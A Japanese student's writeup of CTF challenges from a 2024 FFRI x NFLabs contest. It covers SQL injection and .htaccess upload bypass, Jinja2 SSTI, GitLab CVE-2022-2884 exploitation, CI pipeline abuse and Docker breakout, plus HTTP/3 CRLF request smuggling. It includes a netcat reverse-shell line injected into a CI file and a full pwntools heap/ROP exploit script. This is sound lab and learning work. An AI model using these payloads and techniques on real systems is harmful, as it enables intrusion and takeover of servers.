初めまして,prime_1019 と申します.
9月17日~9月20日に開催された FFRI Security x NFLabs. Cybersecurity Challenge For Students 2024 に参加し準優勝する事が出来ました.せっかくなので Writeup 記事も書いてみようと思います.
運営の方へ
今回,Writeup賞にも応募させて頂いていますが,その締め切りである 10/6 23:59 以降も大幅に追記をしています.
もしルールに差し障る場合,編集履歴から一番最初の版を参照して頂けますと幸いです.
よろしくお願いいたします.
初めに
初めに軽く自己紹介させていただきます.
改めて,prime_1019 と申します.
普段は Hack The Box ばかりやっていて,マシンの攻略や Challenges という実質 CTF の問題を解いたりしてます.
実は CTF の大会に出るのは今回が初めてでした.
常々出てみたいと思っていたのですが, CTF のチーム組める知り合いがいなかったり(ソロでも参加していい事を知らず...),大学の方が忙しかったりでこれまでは出ていませんでした.
今回を機にセキュリティ関係用の X アカウント( https://x.com/prime_1019 )を作ってみたので,是非色んな方と繋がれると嬉しいです.
こちらからもアカウントを見つけられた方はフォローさせて頂きます!
Pentest
[Medium] Gallery
太郎君が撮った写真を公開しているサーバから flag を計二つ取得するのが目標です.
最初の flag は /var/www/flag1.txt
にあるとのこと.
とりあえず nmap をかけると,22 番ポートと 80 番ポートが開いている事が分かります.
nmap 結果
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-07 06:08 JST
Nmap scan report for gallery.ctf (10.0.102.82)
Host is up (0.029s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 63:af:de:47:df:5e:15:5c:d1:e7:22:b9:dd:6a:bb:1e (ECDSA)
|_ 256 db:b2:93:7a:6b:9e:f4:f2:8e:74:a3:69:45:46:ba:d5 (ED25519)
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: My Gallery
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.71 seconds
Web
Top ページには太郎君の写真がありますが,その他は特に何もありません.
ffuf
でディレクトリを enum すると, admin
ディレクトリが見つかります.
アクセスするとログイン画面へ.
ユーザー名: admin でいくつか脆弱パスワードを試すもダメだったので,次に SQL インジェクションも疑います.
こちらもいくつか,よくある物をまず試します.
すると 1' or 1=1; -- -
が上手く行きました.こちらをユーザー名にしてパスワードは適当に入れておくとログイン出来ます.
次はファイルアップロードが可能です.
しかし .php
拡張子のファイルは弾かれてしまいます.
その他,.pHp
や .php5
のようなバイパスも全て弾かれるか,PHP として実行されないのどちらかでした.
少し詰まり,色々検索しているとこのページが見つかりました.
内容は .htaccess
がアップロード可能なら,PHP として実行される拡張子を .htaccess
内で設定する事で拡張子制限をバイパス出来るという物.
試してみると .htaccess
というファイル名は弾かれないので,これがいけるかも.
.htaccess
の中身を次の様にしてアップロードします.
AddType application/x-httpd-php .test
そしてリバースシェルを実行する PHP ファイルを用意し,名前を rev.test
に変更してアップロードします.
アップロードされた場所が分かりませんが,Top ページの太郎君の写真の URL を調べると /upploads/images
にある事が分かります.
そこで http://gallery.ctf/uploads/images/rev.test
にアクセスしてみると...
無事リバースシェルが取れました.
flag1 も取得可能です.
www-data@ip-10-0-102-82:/var/www$ cat flag1.txt
flag{you_exploit_SQLi_and_Uploader}
Privage Escalation
二つ目の flag は /root/flag2.txt
にあるとの事です.
一般ユーザーとして yamada
がいますので,まずここを目指します.
まだ Web ページでの正規のユーザー名/パスワードが分かっていないので,そちらを狙っていきます.
/var/www/html/admin/login.php
の中に DB の認証情報がべた書きされています.
これを使って DB からユーザー名とパスワードハッシュを取り出します.
ハッシュをパスワードクラックにかけます.
yamada
のパスワードが割れました.使い回している事を祈ります.
パスワードによる SSH ログインが出来ない設定になっている為,リバースシェル上で su
コマンドを実行します.
www-data@ip-10-0-102-82:/var/www/html/admin$ su yamada
Password:
yamada@ip-10-0-102-82:/var/www/html/admin$
無事 yamada
になれました.
sudo -l
で何か sudo
での実行許可が為されていないか調べると,
yamada@ip-10-0-102-82:/var/www/html/admin$ sudo -l
[sudo] password for yamada:
Matching Defaults entries for yamada on ip-10-0-102-82:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User yamada may run the following commands on ip-10-0-102-82:
(ALL) /usr/bin/vim
vim
コマンドが実行可能の様ですね.
vim
は,その中で任意のシェルコマンドが実行し放題ですから,これで root
がとれそうです.
sudo vim
で vim
を起動し,:!cat /root/flag2.txt
とコマンド入力.
すると,
:!cat /root/flag2.txt
Press ENTER or type command to continue
flag{vim_is_useful_for_escalating_privilege}
無事 flag2 が得られました.
もうひと手間でシェルも取れます.
この問題は以上です.
.htaccess
を用いたバイパステクは抑えられていなかったので,次からはすぐ疑っていきたいです.
[Hard] Labs
革新技術総合研究所のサーバーにペネトレーションテストを行うというシナリオ.
Flag は3つあるようです.
まず nmap をかけると,開いているのは再び 22 番と 80 番ポートのみである事が分かります.
nmap 結果
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-25 03:30 JST
Nmap scan report for labs.ctf (10.0.102.216)
Host is up (0.019s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 47:76:82:25:54:3c:0b:28:77:c1:14:be:36:44:84:12 (ECDSA)
|_ 256 bd:e8:bb:af:f5:f4:ff:25:86:db:8a:85:43:89:bd:1a (ED25519)
80/tcp open http nginx 1.27.1
|_http-title: \xE9\x9D\xA9\xE6\x96\xB0\xE6\x8A\x80\xE8\xA1\x93\xE7\xB7\x8F\xE5\x90\x88\xE7\xA0\x94\xE7\xA9\xB6\xE6\x89\x80
|_http-server-header: nginx/1.27.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.90 seconds
再び Web から見ていきます.
Web
Web ページ内で怪しいのはお問合せフォームのみだったので,こちらを調べます.
フォームを適当に埋めて送信すると,
この様にフォームで入力した名前がそのまま表示されています.
このような時,自分はまず SSTI を試してみます.
名前を {{ 7*7 }}
にして再度送信すると,
49 になって返ってきました.SSTI が刺さってそうです.
後は HackTricks のページ等を参考にテンプレートエンジンの特定を行うと Jinja2 っぽい事が分かります.
(何故か HackTricks には,Jinja2 において {{7*7}} = Error
と書いてありますが恐らく誤植です.)
HackTricks に書いてあるように Jinja2 に対する SSTI では RCE が可能なので,これでリバースシェルが得られます.
入った先のディレクトリに flag1.txt があります.
コンテナその①
入った先は Docker コンテナ内の様です.
まず LinPEAS を使って Docker jailbreak 可能な設定等がなされていないか調べてみましたが,特に目ぼしいものはありませんでした.
次に Web root を調べます.
特に .git
ディレクトリが在るのが怪しそうです.
実際 .git/config
ファイルを見てみると
root@1518b9a89b7a:/app/.git# cat config
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = http://oauth2:glpat-kYuPHTcf4p1aXDUNx3Rz@192.168.0.10/application/contact.git
fetch = +refs/heads/*:refs/remotes/origin/*
[branch "main"]
remote = origin
merge = refs/heads/main
URL の所に認証情報が書いてあります.
次の取っ掛かりはこれっぽいですね.
まず 192.168.0.10
というホストが何者かが気になります.
curl 192.168.0.10
とやってみるとレスポンスが返ってくるので Chisel を使って,ローカルの 8888 番ポートを 192.168.0.10
の 80 番ポートにポートフォワードしてやります.
そしてアクセスしてみると GitLab のログイン画面が出てきました.
先ほどの認証情報は GitLab 関係の物のようです.
実際 「GitLab glpat」で検索してみると API や レポジトリにアクセスできるトークンである事が分かります.
API ドキュメントを参考にレポジトリ等を enum したり,hooks を悪用できないか色々試しましたがめぼしい物は得られず.
一時間程経ってようやく CVE を調べました.(こういう enum 等色々できる機能があるとついそちらに夢中になってしまって,脆弱性の存在を疑うのが後回しになってしまうのが良くない癖です...)
バージョンは API から取得できて,15.3.0
である事が分かります.
「GitLab 15.3.0 vulnerability」で検索すると CVE-2022-2884 が出てきました.
API アクセスがあればリモートコード実行できると書いてあるのでこれが使えそうです.
PoC も公開されているので試してみます.
使ったものはこちら.
クローンして実行します.
required と言われた所を埋めて再度実行.
(COMMAND
は,ローカルに建てた Web サーバーにアクセスさせる物にしました.)
しかし,
このようにエラーが出て上手く行きません.
他にオプションで調整できそうなのは -tn TARGET_NAMESPACE
ぐらいなのでここを調べます.
/namespaces
という API エンドポイントがあるので投げてみると,
二つの namespace が返ってきました.
一つ目の m.kobayashi
を -tn
オプションに設定して試してみます.
今度はエラーは出ず.Web サーバーの方を確認してみると...
アクセスが来ています!RCE 成功です.
再びリバースシェルします.
git
ユーザーとしてログインしています.
find
で探すと flag2.txt
が見つかります.
git@git:~$ find / -name flag?.txt 2>/dev/null
find / -name flag?.txt 2>/dev/null
/etc/gitlab/flag2.txt
git@git:~$ cat /etc/gitlab/flag2.txt
cat /etc/gitlab/flag2.txt
flag{Y0U_COMPLETED_HIDDEN_SERVER_RC3!!}
コンテナその②
入った先は再び Docker コンテナでした.
GitLab をホストしているコンテナですから,GitLab 関係をあさるのが良さそうです.
特にまだ GitLab にログイン出来ていないのでそちらを狙っていきます.
ここから少しだけ想定解法と違う動きをしていました.
(想定解法は flag と同じディレクトリに GitLab のアドミンのイニシャルパスワードが置いてあり,それを使ってアドミンユーザーにログインするというものだったのですが,普通に見落としていました.愚か...)
DB をいじってパスワード変更できないかと色々調べていたところ,とても便利なツールがある事が分かりました.
それが GitLab Rails console です.
これを使うと GitLab の設定変更・管理をコンソールを通して簡単に直接行う事が出来ます.
しかも git
ユーザーであれば使用可能のようです.
そこで,ドキュメントを参考にしてアドミンユーザー(ユーザー名: root
)のパスワード変更を行います.
これで変更できたはず.
先ほどの GitLab のログイン画面に戻り root
でログインします.
出来ました.
レポジトリをあさると NewWebSiteTest2
に面白そうなファイル .gitlab-ci.yml
があります.
# This file is a template, and might need editing before it works on your project.
# To contribute improvements to CI/CD templates, please follow the Development guide at:
# https://docs.gitlab.com/ee/development/cicd/templates.html
# This specific template is located at:
# https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Docker.gitlab-ci.yml
# Build a Docker image with CI/CD and push to the GitLab registry.
# Docker-in-Docker documentation: https://docs.gitlab.com/ee/ci/docker/using_docker_build.html
#
# This template uses one generic job with conditional builds
# for the default branch and all other (MR) branches.
docker-build:
# Use the official docker image.
image: docker:24.0.5
stage: build
tags:
- docker-build
before_script:
- docker login -u "$CI_REGISTRY_USER" -p "$CI_REGISTRY_PASSWORD" $CI_REGISTRY
# Default branch leaves tag empty (= latest tag)
# All other branches are tagged with the escaped branch name (commit ref slug)
script:
- |
if [[ "$CI_COMMIT_BRANCH" == "$CI_DEFAULT_BRANCH" ]]; then
tag=""
echo "Running on default branch '$CI_DEFAULT_BRANCH': tag = 'latest'"
else
tag=":$CI_COMMIT_REF_SLUG"
echo "Running on branch '$CI_COMMIT_BRANCH': tag = $tag"
fi
- docker build --pull -t "$CI_REGISTRY_IMAGE${tag}" .
- docker push "$CI_REGISTRY_IMAGE${tag}"
# Run this job in a branch where a Dockerfile exists
rules:
- if: $CI_COMMIT_BRANCH
exists:
- Dockerfile
冒頭のコメントにもある通りこのファイルでは CI/CD に関する設定が記述されており,このレポジトリに push が入るとファイル中で記述された before_script
, script
が実行されるようです.
問題はどこでそのスクリプトが実行されるかですが,それを設定しているのが
tags:
- docker-build
の部分です.この docker-build
が何者であるかはレポジトリの Settings -> CI/CD -> Runners
から見る事ができます.
IP から察するにまた新しいコンテナのようですね!
before_script
を変更して再びリバースシェルを取ります.
(GitLab 上で直接編集するとお手軽です.)
# This file is a template, and might need editing before it works on your project.
# To contribute improvements to CI/CD templates, please follow the Development guide at:
# https://docs.gitlab.com/ee/development/cicd/templates.html
# This specific template is located at:
# https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Docker.gitlab-ci.yml
# Build a Docker image with CI/CD and push to the GitLab registry.
# Docker-in-Docker documentation: https://docs.gitlab.com/ee/ci/docker/using_docker_build.html
#
# This template uses one generic job with conditional builds
# for the default branch and all other (MR) branches.
docker-build:
# Use the official docker image.
image: docker:24.0.5
stage: build
tags:
- docker-build
before_script:
- mkfifo /tmp/fg;/bin/sh -i </tmp/fg 2>&1 |nc 192.168.100.10 1236 >/tmp/fg
- docker login -u "$CI_REGISTRY_USER" -p "$CI_REGISTRY_PASSWORD" $CI_REGISTRY
# Default branch leaves tag empty (= latest tag)
# All other branches are tagged with the escaped branch name (commit ref slug)
script:
- |
if [[ "$CI_COMMIT_BRANCH" == "$CI_DEFAULT_BRANCH" ]]; then
tag=""
echo "Running on default branch '$CI_DEFAULT_BRANCH': tag = 'latest'"
else
tag=":$CI_COMMIT_REF_SLUG"
echo "Running on branch '$CI_COMMIT_BRANCH': tag = $tag"
fi
- docker build --pull -t "$CI_REGISTRY_IMAGE${tag}" .
- docker push "$CI_REGISTRY_IMAGE${tag}"
# Run this job in a branch where a Dockerfile exists
rules:
- if: $CI_COMMIT_BRANCH
exists:
- Dockerfile
注意点として,次のコンテナには bash
が無いらしく,いつもの /dev/tcp/IP/port
記法が使えない為,nc
を使ったリバースシェルペイロードを用いています.
これを commit すると自動で CI/CD が実行され,シェルが取れました.
コンテナその③
またコンテナ...ですが,一つ希望があります.
というのもこのコンテナ内では docker
コマンドを使える事が先ほどの CI/CD 設定から分かっています.
HackTricks の Docker Breakout の記事にもある通りこの様な場合,ホストマシンの Docker デーモンにアクセスできる可能性があります.
docker images
を実行してみると,
/builds/infra/NewWebSiteTest2 # docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
php apache 7fda56f6ac98 5 weeks ago 507MB
labs-contact latest 90c2981f3884 5 weeks ago 927MB
nginx latest 5ef79149e0ec 7 weeks ago 188MB
ubuntu 24.04 edbfe74c41f8 2 months ago 78.1MB
python 3.9-bullseye 5e76a2cc4cb1 2 months ago 905MB
docker 24.0.5 7015f2c475d5 14 months ago 335MB
gitlab/gitlab-runner v15.3.0 6e67ae410c31 2 years ago 691MB
registry.gitlab.com/gitlab-org/gitlab-runner/gitlab-runner-helper x86_64-bbcb5aba eb09578c5124 2 years ago 58.9MB
gitlab/gitlab-ce 15.3.0-ce.0 2f07246b6539 2 years ago 2.64GB
色々出てきて怪しいです.
ホストマシンのルートディレクトリを /host
にマウントしたコンテナを建て,/host/root
を見てみます.
/builds/infra/NewWebSiteTest2 # docker run --rm -v /:/host/ ubuntu:24.04 ls -al /host/root/
total 40
drwx------ 5 root root 4096 Sep 3 07:20 .
drwxr-xr-x 20 root root 4096 Aug 30 05:23 ..
lrwxrwxrwx 1 root root 9 Aug 30 05:58 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Oct 15 2021 .bashrc
drwx------ 3 root root 4096 Aug 30 07:25 .docker
-rw------- 1 root root 20 Aug 30 06:29 .lesshst
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
drwx------ 2 root root 4096 Aug 30 05:47 .ssh
-rw-rw-rw- 1 root root 1063 Sep 3 07:20 .viminfo
-rw------- 1 root root 36 Aug 30 07:29 flag3.txt
drwx------ 3 root root 4096 Aug 30 05:47 snap
flag3.txt
ありました!
これを見れば終わりですが,一応シェルも取っておきました (/root/.ssh/authorized_keys
に公開鍵を書きこんで SSH ログイン).
root@labs:~# id
uid=0(root) gid=0(root) groups=0(root)
root@labs:~# cat flag3.txt
flag{ABUSE_CICD_4ND_D0CKER_PR1V!!!}
これでクリアです.
実際は書いた事以外にも色々と右往左往していて,時間としても8時間程かかってます.
ですがそれは自分の力不足の為で,ラビットホールやエスパー箇所などは一切感じず,自然な流れで解くことができ非常に楽しかったです!
Binary Exploitation
[Medium] Cup
バイナリファイル cup
が配布されます.
超大人気オンラインゲーム Cup での対戦が楽しめるとの事...
起動し,必要事項を入力.
Room password を合言葉にして対戦を行う事が出来ます.
また Room password を空にすると,最近よくこのゲームを遊んでいる FFRAI さんがいつでも相手をしてくれます.
FFRAI さんを倒すと flag が聞き出せるとの事です.
肝心のゲーム内容ですが,
この様に $X × X$ (画像では $X=3$) 個のカップがあり (F
が中身の入ったカップを表す),毎ターン $1$ 以上 $X$ 未満の好きな個数分カップを飲んでいって最初に飲めなくなった方の負け,というものです.
よくある石取りゲームですね.
親切な FFRAI さんはいつも先手を譲ってくれますが,言わずもがな 後手必勝 です.
なので何か悪い事をしないと勝てません.
方針
Cup ではプレイヤーの入力値のチェックをサーバーサイドで行っているようです.
例えば次の箇所です.
len = send(sock,num_of_cups,4,0); // 飲んだカップの数を送信
if (len == 4) {
len = recv(sock,&server_check,1,0); // サーバーからチェック結果を受信
if (len == 1) {
if (server_check == '\0') { // 0 なら問題なし
// 以下,飲んだカップの座標値を送信
これは手番のプレーヤーが飲んだカップの情報を送信する部分の逆コンパイル結果の一部です.
コメントにあるように3行目でサーバーから,飲んだカップの数についてのチェック結果を受信しています.
例えば飲んだカップの数を 0 にして送信すると,サーバーからは \0
ではなく \x02
が返送され,その後正常なゲームが成り立たなくなります.
しかしチェックの洩れている箇所があります.
それは飲んだカップの座標値です.
逆コンパイル結果全体を見ると分かるのですが,飲んだカップの座標値を送信後にチェック結果を受信する箇所はありません.
ここをついて上手く手番を誤魔化します.
Exploit
実際に Exploit を行っていきます.
今度は,飲んだカップの数及びカップの座標値を受信する処理を見てみます.
(逆コンパイル結果を読みやすく書き直し,例外処理等は全て省略しています.)
unsigned int num_of_cups; // 相手が選んだカップ数
recv(sock, &num_of_cups, 4, 0); // num_of_cups を受信
char *buffer = malloc(X * 2); // カップの座標を書き込むバッファー (X は開始時に選んだボードサイズ)
if(num_of_cups != 0){
// 座標値の読み込み
for(unsigned int i = 0; i < num_of_cups; ++i){
recv(sock, buffer + i * 2 + 1, 1, 0); // i 番目のカップの x 座標(行番号)受信
recv(sock, buffer + i * 2, 1, 0); // i 番目のカップの y 座標(列番号)受信
}
// 盤面情報の更新
for(unsigned int i = 0; i < num_of_cups; ++i){
// 「i 番目のカップの状態を表す byte」のアドレス (*cup_addr == '\0' ⇔ 既に飲まれている)
char *cup_addr = board._8_8_ + (buffer + i * 2 + 1) * X + (buffer + i * 2);
if (*choiced_cup == '\0') { // 既に飲まれているカップが選択された
// 異常終了の処理
}
*choiced_cup = '\0';
}
}
盤面情報の更新において,座標値を参照してアドレス cup_addr
を計算し,*cup_addr
が '\0'
でない (つまりまだ飲まれていない) 事を確認した上で '\0'
に変更するという処理が行われています.
そこで座標値を調節して,cup_addr
が「変えても影響なさそう」かつ「値が '\0'
でない」メモリを指すようにします.
結果から言うと x 座標を 0, y 座標を 0x40 にするとこれが達成できます.
(実際に動かしてみてメモリの様子を覗くと分かります.)
また送信する際は自分の盤面情報もメモリを直接いじって整合性を取ります.
以下具体的にやってみます.
-
gdb cup
で GDB を起動 -
game_loop+605
にブレークポイントを貼る -
FFRAI さんと対戦開始 (ボードサイズは3としておく)
-
x/2g &board
とコマンド実行結果gdb-peda$ x/2g &board 0x55555555a3f0 <board>: 0x0000000000000003 0x000055555558dcb0
-
x/2g "5 の結果中右側のアドレス"
とコマンド実行結果gdb-peda$ x/2g 0x000055555558dcb0 0x55555558dcb0: 0x0101010101010100 0x0000000000000001
これが盤面情報にあたります.
{char}0x55555558dcb0 == '\0'
,つまり飲まれている状態になっています. -
set {char}0x55555558dcb0=1
と実行
これで手元の盤面は初期状態. -
set {char}$rdx=0x40
と実行
送信される y 座標値を0x40
にセットしました (x 座標値は元々 0 なので変えなくてよい). -
continue
する
以上です.
作問者の方曰くいくつか解法があるとの事なのですが,自分はまだこれしか思いついていないのでもう少し考えてみたい所です.
(飲んだカップの数を誤魔化すのも頑張ればいけそう?)
後,いつでもネトゲをしている FFRAI さんの健康が僕は心配です.
[Hard] brownian heap
Heap 問怖い...
Heap にまだまだ慣れておらず,10時間程かかって何とか解けました.
解き方は想定解法とほぼ全く同じだったので,ここではエクスプロイトの共有にとどめたいと思います.
エクスプロイトコード
from pwn import *
addr = "10.0.102.241"
p = process(["nc", addr, "1827"])
p_addr = 0
p1_addr = 0
p1_malloced = 0
libc_base = 0
stack_addr = 0
tcache_addr = 0
def pack8(n: int):
return n.to_bytes(8, "little")
def ropper(libc_base, popret, binsh, system, ret=None):
if ret == None:
ret = popret + 1
return (
pack8(popret + libc_base)
+ pack8(binsh + libc_base)
+ pack8(ret + libc_base)
+ pack8(system + libc_base)
)
def cmd0():
p.recvuntil(b"cmd: ")
p.send(b"0\n")
def cmd1(addr):
p.recvuntil(b"cmd: ")
p.send(b"1\n")
p.recvuntil(b"Offset: ")
p.send(format(addr - p_addr, "x").encode() + b"\n")
return int(p.recvline()[7:], base=16)
def cmd2(addr, data):
p.recvuntil(b"cmd: ")
p.send(b"2\n")
p.recvuntil(b"Offset: ")
p.send(format(addr - p_addr, "x").encode() + b"\n")
p.recvuntil(b"Data: ")
p.send(format(data, "x").encode() + b"\n")
def cmd3():
global p1_malloced
p.recvuntil(b"cmd: ")
p.send(b"3\n")
p1_malloced = 0
def cmd4():
global p1_malloced
p.recvuntil(b"cmd: ")
p.send(b"4\n")
p1_malloced = 1
def cmd5(addr):
p.recvuntil(b"cmd: ")
p.send(b"5\n")
p.recvuntil(b"Offset: ")
p.send(format(addr - p1_addr, "x").encode() + b"\n")
return int(p.recvline()[7:], base=16)
def cmd6(addr, data):
p.recvuntil(b"cmd: ")
p.send(b"6\n")
p.recvuntil(b"Offset: ")
p.send(format(addr - p1_addr, "x").encode() + b"\n")
p.recvuntil(b"Data: ")
p.send(format(data, "x").encode() + b"\n")
def leak_libc():
global libc_base
off = 0x20
while 1:
p.recvuntil(b"cmd: ")
p.send(b"1\n")
p.recvuntil(b"Offset: ")
p.send(format(off, "x").encode() + b"\n")
fd = int(p.recvline()[7:], base=16)
p.recvuntil(b"cmd: ")
p.send(b"1\n")
p.recvuntil(b"Offset: ")
p.send(format(off + 8, "x").encode() + b"\n")
bk = int(p.recvline()[7:], base=16)
if (
fd <= 0x655500000000
and fd >= 0x555500000000
and bk <= 0x655500000000
and bk >= 0x555500000000
):
break
off += 0x10
cnt = 1
while 1:
p.recvuntil(b"cmd: ")
p.send(b"1\n")
p.recvuntil(b"Offset: ")
p.send(format(fd - p_addr + 0x10, "x").encode() + b"\n")
fd = int(p.recvline()[7:], base=16)
if fd >= 0x600000000000:
libc_base = fd - 0x203B20
print("libc base leaded!: " + hex(libc_base))
break
cnt += 1
return libc_base
def free_p1():
cmd6(p1_addr - 8, 0x21)
cmd6(p1_addr + 0x18, 0x21)
cmd3()
print("freed p1!")
def set_p1(addr):
global p1_addr
if p1_malloced:
free_p1()
cmd2(tcache_addr, 0x0007000700070007)
cmd2(tcache_addr + 0x80, addr)
cmd4()
p1_addr = addr
print(f"p1 addr changed!: " + hex(addr))
def leak_stack():
global stack_addr
environ_addr = libc_base + 0x20AD5
stack_addr = cmd5(environ_addr) - 0x188
print("stack addr leaked!: " + hex(stack_addr))
def leak_tcache():
global tcache_addr
addr = p_addr + (-p_addr) % 0x1000 + 0x10
while 1:
if cmd1(addr) == 0x0007000700070006:
print("tcache addr leaked!: " + hex(addr))
tcache_addr = addr
break
addr -= 0x1000
def rop():
popret = 0x10F75B
binsh = 0x1CB42F
system = 0x58740
rop_payload = ropper(libc_base, popret, binsh, system)
for i in range(4):
cmd6(
stack_addr + 0x58 + 8 * i,
int.from_bytes(rop_payload[8 * i : 8 * (i + 1)], "little"),
)
free_p1()
cmd0()
p_addr = int(p.recvline()[4:-1], base=16)
print("p addr: " + hex(p_addr))
leak_libc()
leak_tcache()
libc_writable = libc_base + 0x202000 + 0x2000
set_p1(libc_writable)
leak_stack()
set_p1(stack_addr - 0x1000)
rop()
p.interactive()
AAR/W の幅が int 分しか無いのが絶妙に効いている感じがしました.
Heap 問は解けるか自信が無かったので,解けて非常に嬉しかったです.
怖いと言いましたが冗談で,実際はとても面白く感じているのでこれからも勉強していきたいです.
Web Exploitation
[Medium] HTTP Sunshine
問題は次の通り.
- パッチのあたった HAProxy が動作しており,その後ろに HTTP Echo Server が動作している
- client から HAProxy の間の通信は HTTP/1.1, HTTP/2, HTTP/3のいずれか,HAProxy と HTTP Echo Server の間の通信はHTTP/1.1
- HAProxy は flag を f ヘッダーフィールドとして追加して HTTP Echo Server へリクエストを転送するので,これをリークさせたい
- パッチは HTTP/3 の処理の際,ヘッダー値に含まれる null 文字や CR, LF 等の特殊文字を見逃す様にしたもの
この設定と問題名から恐らく HTTP Request Smuggling を使いそうとは思いました.
しかし HTTP Request Smuggling は HTTP/1.1 上でしかやった事がなく,HTTP/2 や HTTP/3 はプロトコル自体あまり直接触った事が無かったので色々勉強しながら解きました.
その過程で次の記事を最も参考にさせて頂きました.
HTTP/1.1 へのダウングレード
上記の記事等で勉強した結果,HTTP/1.1 へのダウングレードにおける CRLF インジェクションで解けるのではないかと思いました.
簡単に原理を説明します.
まず通常の HTTP/2 や HTTP/3 ペイロードの例を見てみます.
:method POST
:scheme http
:authority sunshine.ctf
:path /
content-length 3
foo bar
aaa
これらを実際にはバイナリデータの形に直してから送信します.
何となく意味は分かるかと思いますが,これを HTTP/1.1 に直す (ダウングレードする) と次のようになります.
POST / HTTP/1.1
Host: sunshine.ctf
Content-Length: 3
foo: bar
aaa
ヘッダーとボディーをフレームという単位で分けるのが,HTTP/2 や HTTP/3 の特徴的な点の一つです (HTTP/1.1 では 2個続きの CRLF で分けていました).
今回の場合は f ヘッダーフィールドも追加される為,次のようになって Echo Server に送られると考えられます.
POST / HTTP/1.1
Host: sunshine.ctf
Content-Length: 3
foo: bar
f: flag
aaa
そして Echo Server がそのまま返してくれるのは POST データだけなので残念ながら flag は見られません.
CRLF インジェクション
そこで今回の条件「ヘッダー値に特殊文字を入れても良い」を使います.
特に CRLF は HTTP/1.1 においてのみヘッダーとボディーを分けるという重要な意味を持つので,これを上手く用いたい所です.
答えとしては次のようにすれば良さそうです.
:method POST
:scheme http
:authority sunshine.ctf
:path /
content-length 3
foo bar\r\n
aaa
(ただし \r
, \n
は(印刷不可能文字としての) CR, LF を表します.)
こうすると HTTP/1.1 にダウングレードした時,次のようになりそうです.
POST / HTTP/1.1
Host: sunshine.ctf
Content-Length: 3
foo: bar
f: flag
aaa
ヘッダー foo: bar
の後に CRLF が一回余計に入っています.
これで Echo Server は f: flag
以下が POST データであると誤認してくれそうですね.
ただしこのままだと 3 byte 分 (f:
まで)しか返してくれないので,flag の長さに応じて Content-Length 及び POST データ aaa
の長さを大きくしてやります.
やってみる
以上を実行に移したいのですが,ヘッダー値に CRLF を仕込んで HTTP/3 リクエストするのに非常に時間がかかりました (本来禁じられている事なので当然と言えば当然なのですが).
HTTP/1.1 であれば netcat で繋いで生の HTTP リクエストを書くなりすれば済む話です.
しかし HTTP/3 はバイナリベースかつトランスポート層のプロトコルが QUIC という状況でそんな原始的な方法は中々厳しそう.
既成の HTTP/3 クライアントでやってみます.
まず試したのが curl.
ただし curl の HTTP/3 への対応状況はまだ Experimental という段階なので,普通にインストールされているものでは出来ません.
今回は docker image を用いてやってみました.が,やはり CRLF が入力される事が想定されておらず上手く動作しませんでした.
しかし,現状 HTTP/3 リクエストをある程度いじって投げたい場合はこれが最も手軽?
次に試したのが aioquic です.
こちらは Python の QUIC 及び HTTP/3 ライブラリです.
examples の中に http_client.py があります.これを少し改造しました.
具体的には,ヘッダーの設定を行っている箇所を探し,次のように変更を加えました.
左がオリジナルで右が改造版です.
229 行目に CRLF インジェクションを含むヘッダーを直接仕込んでいます.
念の為コード全体も付しておきます.
http_client.py
import argparse
import asyncio
import logging
import os
import pickle
import ssl
import time
from collections import deque
from typing import BinaryIO, Callable, Deque, Dict, List, Optional, Union, cast
from urllib.parse import urlparse
import aioquic
import wsproto
import wsproto.events
from aioquic.asyncio.client import connect
from aioquic.asyncio.protocol import QuicConnectionProtocol
from aioquic.h0.connection import H0_ALPN, H0Connection
from aioquic.h3.connection import H3_ALPN, ErrorCode, H3Connection
from aioquic.h3.events import (
DataReceived,
H3Event,
HeadersReceived,
PushPromiseReceived,
)
from aioquic.quic.configuration import QuicConfiguration
from aioquic.quic.events import QuicEvent
from aioquic.quic.logger import QuicFileLogger
from aioquic.quic.packet import QuicProtocolVersion
from aioquic.tls import CipherSuite, SessionTicket
try:
import uvloop
except ImportError:
uvloop = None
logger = logging.getLogger("client")
HttpConnection = Union[H0Connection, H3Connection]
USER_AGENT = "aioquic/" + aioquic.__version__
class URL:
def __init__(self, url: str) -> None:
parsed = urlparse(url)
self.authority = parsed.netloc
self.full_path = parsed.path or "/"
if parsed.query:
self.full_path += "?" + parsed.query
self.scheme = parsed.scheme
class HttpRequest:
def __init__(
self,
method: str,
url: URL,
content: bytes = b"",
headers: Optional[Dict] = None,
) -> None:
if headers is None:
headers = {}
self.content = content
self.headers = headers
self.method = method
self.url = url
class WebSocket:
def __init__(
self, http: HttpConnection, stream_id: int, transmit: Callable[[], None]
) -> None:
self.http = http
self.queue: asyncio.Queue[str] = asyncio.Queue()
self.stream_id = stream_id
self.subprotocol: Optional[str] = None
self.transmit = transmit
self.websocket = wsproto.Connection(wsproto.ConnectionType.CLIENT)
async def close(self, code: int = 1000, reason: str = "") -> None:
"""
Perform the closing handshake.
"""
data = self.websocket.send(
wsproto.events.CloseConnection(code=code, reason=reason)
)
self.http.send_data(stream_id=self.stream_id, data=data, end_stream=True)
self.transmit()
async def recv(self) -> str:
"""
Receive the next message.
"""
return await self.queue.get()
